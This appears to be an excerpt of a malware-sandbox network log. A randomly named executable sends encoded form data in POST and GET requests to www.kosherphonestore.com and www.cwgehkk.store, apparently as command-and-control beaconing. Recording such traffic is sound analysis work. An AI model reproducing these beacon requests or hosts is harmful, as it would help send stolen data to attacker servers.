                                              Jul 3, 2024 16:39:32.818922043 CEST350INData Raw: 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65
                                              Data Ascii: :604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=84.999800X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Downlo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.54971384.32.84.130805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:39:56.006809950 CEST820OUTPOST /ktbm/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.kosherphonestore.com
                                              Origin: http://www.kosherphonestore.com
                                              Referer: http://www.kosherphonestore.com/ktbm/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d
                                              Data Ascii: k06T=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
                                              Jul 3, 2024 16:39:56.471627951 CEST1218INHTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:39:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 1519ecb6f9e8e9e6e760b6f956740057-bos-edge1
                                              x-hcdn-cache-status: DYNAMIC
                                              x-hcdn-upstream-rt: 0.002
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.54971484.32.84.130805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:39:58.542188883 CEST840OUTPOST /ktbm/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.kosherphonestore.com
                                              Origin: http://www.kosherphonestore.com
                                              Referer: http://www.kosherphonestore.com/ktbm/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 77 6b 45 31 6b 2f 51 36 32 6d 34 33 44 61 76 53 32 6e 33 76 44 76 76 6c 4f 4b 78 62 37 64 6c 79 6e 77 32 71 36 6d 4d 43 2b 49 50 4e 32 63 4c 38 2f 4d 37 2f 77 74 77 61 6d 2f 67 52 75 5a 52 55 6a 31 35 58 2b 56 4f 45 67 54 48 49 52 46 33 4f 68 77 31 73 4c 69 4f 76 79 4f 78 39 6a 5a 5a 53 45 69 35 50 38 77 48 45 41 4c 54 68 6c 73 77 50 42 47 45 74 53 42 42 37 64 57 5a 62 35 77 6f 70 41 43 54 7a 63 6f 70 6b 68 64 69 4d 59 68 42 4c 51 34 6c 36 73 69 35 5a 65 74 70 7a 50 57 35 55 6e 73 63 61 30 62 32 64 58 74 64 72 4d 55 41 43 6e 41
                                              Data Ascii: k06T=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwbwkE1k/Q62m43DavS2n3vDvvlOKxb7dlynw2q6mMC+IPN2cL8/M7/wtwam/gRuZRUj15X+VOEgTHIRF3Ohw1sLiOvyOx9jZZSEi5P8wHEALThlswPBGEtSBB7dWZb5wopACTzcopkhdiMYhBLQ4l6si5ZetpzPW5Unsca0b2dXtdrMUACnA
                                              Jul 3, 2024 16:39:59.017893076 CEST1218INHTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:39:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 1ee731d08ec6e50cdb3c3817ee9e9ce9-bos-edge1
                                              x-hcdn-cache-status: DYNAMIC
                                              x-hcdn-upstream-rt: 0.001
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.54971584.32.84.130805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:01.074760914 CEST1857OUTPOST /ktbm/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.kosherphonestore.com
                                              Origin: http://www.kosherphonestore.com
                                              Referer: http://www.kosherphonestore.com/ktbm/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 34 6b 48 47 63 2f 52 64 61 6d 35 33 44 61 78 43 33 67 33 76 44 49 76 6c 47 4f 78 61 47 2f 6c 78 66 77 33 4c 61 6d 62 48 53 49 57 39 32 63 44 63 2f 42 31 66 77 43 77 61 32 37 67 52 2b 5a 52 55 6a 31 35 56 32 56 49 56 67 54 49 6f 52 47 68 65 68 38 6b 38 4c 4b 4f 76 4c 78 78 39 6d 37 59 6d 77 69 35 72 59 77 49 53 73 4c 61 68 6c 75 38 76 42 6f 45 74 65 67 42 36 78 6b 5a 61 38 6c 6f 75 30 43 51 33 39 68 32 55 35 67 39 76 67 39 48 73 4d 70 7a 38 38 63 77 34 32 74 74 42 79 79 37 58 4c 6d 63 4f 63 74 30 65 36 56 66 38 51 58 45 46 43 59 72 4c 4a 59 32 57 55 33 52 57 59 52 59 50 51 70 67 51 53 34 6d 4e 52 39 67 78 6b 56 72 4c 39 4b 4e 74 4c 49 74 73 4c 56 45 65 36 66 34 6b 7a 43 4d 6e 4a 61 53 43 37 79 4b 72 39 4f 72 47 61 43 54 42 69 49 50 65 6d 5a 41 34 6e 55 4e 61 42 7a 63 46 58 44 6c 6b 33 65 62 4b 61 68 55 73 5a 6c 70 7a 33 50 4c 43 44 66 69 77 66 37 69 54 70 6f 67 [TRUNCATED]
                                              Data Ascii: k06T=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwb4kHGc/Rdam53DaxC3g3vDIvlGOxaG/lxfw3LambHSIW92cDc/B1fwCwa27gR+ZRUj15V2VIVgTIoRGheh8k8LKOvLxx9m7Ymwi5rYwISsLahlu8vBoEtegB6xkZa8lou0CQ39h2U5g9vg9HsMpz88cw42ttByy7XLmcOct0e6Vf8QXEFCYrLJY2WU3RWYRYPQpgQS4mNR9gxkVrL9KNtLItsLVEe6f4kzCMnJaSC7yKr9OrGaCTBiIPemZA4nUNaBzcFXDlk3ebKahUsZlpz3PLCDfiwf7iTpogsmfWfa60vOSftLtiA31KAMUbmrtPQFaz5L+FDd0SVsE43i6ufIDay2l09HwX50iwuYF/Vh9m6vwwZv3CVt6LtymsWfOaGin319/H+01B4v093f6H1J/X1OB+4DY40X5GRgi6Sqfk6AwTKpcVmmwU+9n6X5YrBnArbKUU/xML3X7HFvcIcO6JvMiAVAZlmRZV/EHuyU7FZ6lBuriWQe8GvFUOfZURMKTOcqJddAuJ1F+Adjr6ynYTGtEDo62VsN+Y+Kcin6tWkaXr0mYEKP1vyR44B+Bzoseis/clzDdJslbHdt1943tqzXErhcKu254Bx7LbVKcuSZ1FJCuZGwASvlQkOOmo2pYGM1Os5Lhy0Agh/QYmF7gK0qpTU4Q7Bnx0EEtLatmuky0MFc+x/6FDev0IovW5uvabtV9gO+AEDU2X9P1IxpxcqjPb40TGNqF/E+0pDYrv9yUbWE1lz6b0mANzH5udFGAqunl8soZFDrgUFzrmx6qUmOOENIIjtN0vmz6MI7wSaO5H1LuRWBRnpyirVSoK+Euvkq/Mfos4b5VZDJQJanHbQiuDjC8OqtGXZJNYv+CDjuAGKSMVj0EqFoNAQ+TR/shYkwjjkHPuNDrlmVZnrWssOrwER7ph7cM7LY9cFLEPnvgBInSTfxZSbiGXPSrcBePstO [TRUNCATED]
                                              Jul 3, 2024 16:40:01.555587053 CEST1218INHTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:40:01 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 0cce8e23151f53ecd70f87c9e8776419-bos-edge1
                                              x-hcdn-cache-status: DYNAMIC
                                              x-hcdn-upstream-rt: 0.000
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.54971684.32.84.130805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:03.615106106 CEST552OUTGET /ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.kosherphonestore.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:40:04.078109026 CEST1236INHTTP/1.1 301 Moved Permanently
                                              Server: hcdn
                                              Date: Wed, 03 Jul 2024 14:40:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 795
                                              Connection: close
                                              location: https://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp
                                              platform: hostinger
                                              content-security-policy: upgrade-insecure-requests
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 60824575b80575562073a24d898237c4-bos-edge1
                                              x-hcdn-cache-status: MISS
                                              x-hcdn-upstream-rt: 0.009
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 styl
                                              Jul 3, 2024 16:40:04.078440905 CEST137INData Raw: 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20
                                              Data Ascii: e="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.54971843.155.26.241805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:09.587575912 CEST799OUTPOST /kwl6/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.cwgehkk.store
                                              Origin: http://www.cwgehkk.store
                                              Referer: http://www.cwgehkk.store/kwl6/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 33 4f 38 77 56 75 6a 76 47 52 4a 37 34 77 31 66 59 6d 72 70 66 43 78 4a 73 47 53 46 42 38 4c 56 66 72 61 55 4a 45 57 76 50 72 38 6d 38 67 42 61 43 63 44 56 4f 54 64 62 78 38 66 73 42 72 54 6b 69 2f 4f 52 39 68 48 44 63 4d 73 6d 64 4e 63 4c 41 4e 4f 42 65 6b 73 64 51 4f 51 58 6b 64 58 57 55 41 56 4f 7a 78 6e 45 2f 4d 51 79 43 59 4f 72 43 34 43 79 65 78 4d 58 64 64 67 75 6a 36 52 4c 48 72 66 55 6d 4c 48 72 61 66 56 2b 65 2b 4b 66 68 55 2b 52 7a 65 6d 73 44 42 5a 39 5a 55 4f 47 4d 78 56 76 55 61 5a 44 45 63 53 4f 6b 4c 51 69 5a 52 66 4a 6e 65 37 37 50 6e 49 3d
                                              Data Ascii: k06T=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+RzemsDBZ9ZUOGMxVvUaZDEcSOkLQiZRfJne77PnI=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.54971943.155.26.241805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:12.120249987 CEST819OUTPOST /kwl6/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.cwgehkk.store
                                              Origin: http://www.cwgehkk.store
                                              Referer: http://www.cwgehkk.store/kwl6/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 76 56 63 4c 71 55 49 42 69 76 4f 72 38 6d 79 41 42 66 47 63 43 62 4f 54 51 37 78 39 7a 73 42 72 33 6b 69 2b 2b 52 38 57 72 41 64 63 73 34 53 74 63 4a 4f 74 4f 42 65 6b 73 64 51 4f 30 74 6b 64 50 57 55 56 64 4f 77 51 6e 44 68 63 52 41 42 59 4f 72 54 6f 43 32 65 78 4d 68 64 63 38 41 6a 2f 56 4c 48 75 37 55 6e 66 54 6f 56 66 56 30 52 65 4c 53 74 6c 50 47 35 73 6d 65 50 79 51 42 47 46 2b 61 4a 48 34 46 4f 34 52 72 58 38 2b 32 30 59 59 56 49 68 2b 67 39 39 72 4c 52 77 63 65 51 69 62 31 6f 42 6f 43 45 50 73 61 6a 33 78 78 4c 71 6e 76
                                              Data Ascii: k06T=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOvVcLqUIBivOr8myABfGcCbOTQ7x9zsBr3ki++R8WrAdcs4StcJOtOBeksdQO0tkdPWUVdOwQnDhcRABYOrToC2exMhdc8Aj/VLHu7UnfToVfV0ReLStlPG5smePyQBGF+aJH4FO4RrX8+20YYVIh+g99rLRwceQib1oBoCEPsaj3xxLqnv


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.54972043.155.26.241805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:40:14.669884920 CEST1836OUTPOST /kwl6/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.cwgehkk.store
                                              Origin: http://www.cwgehkk.store
                                              Referer: http://www.cwgehkk.store/kwl6/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
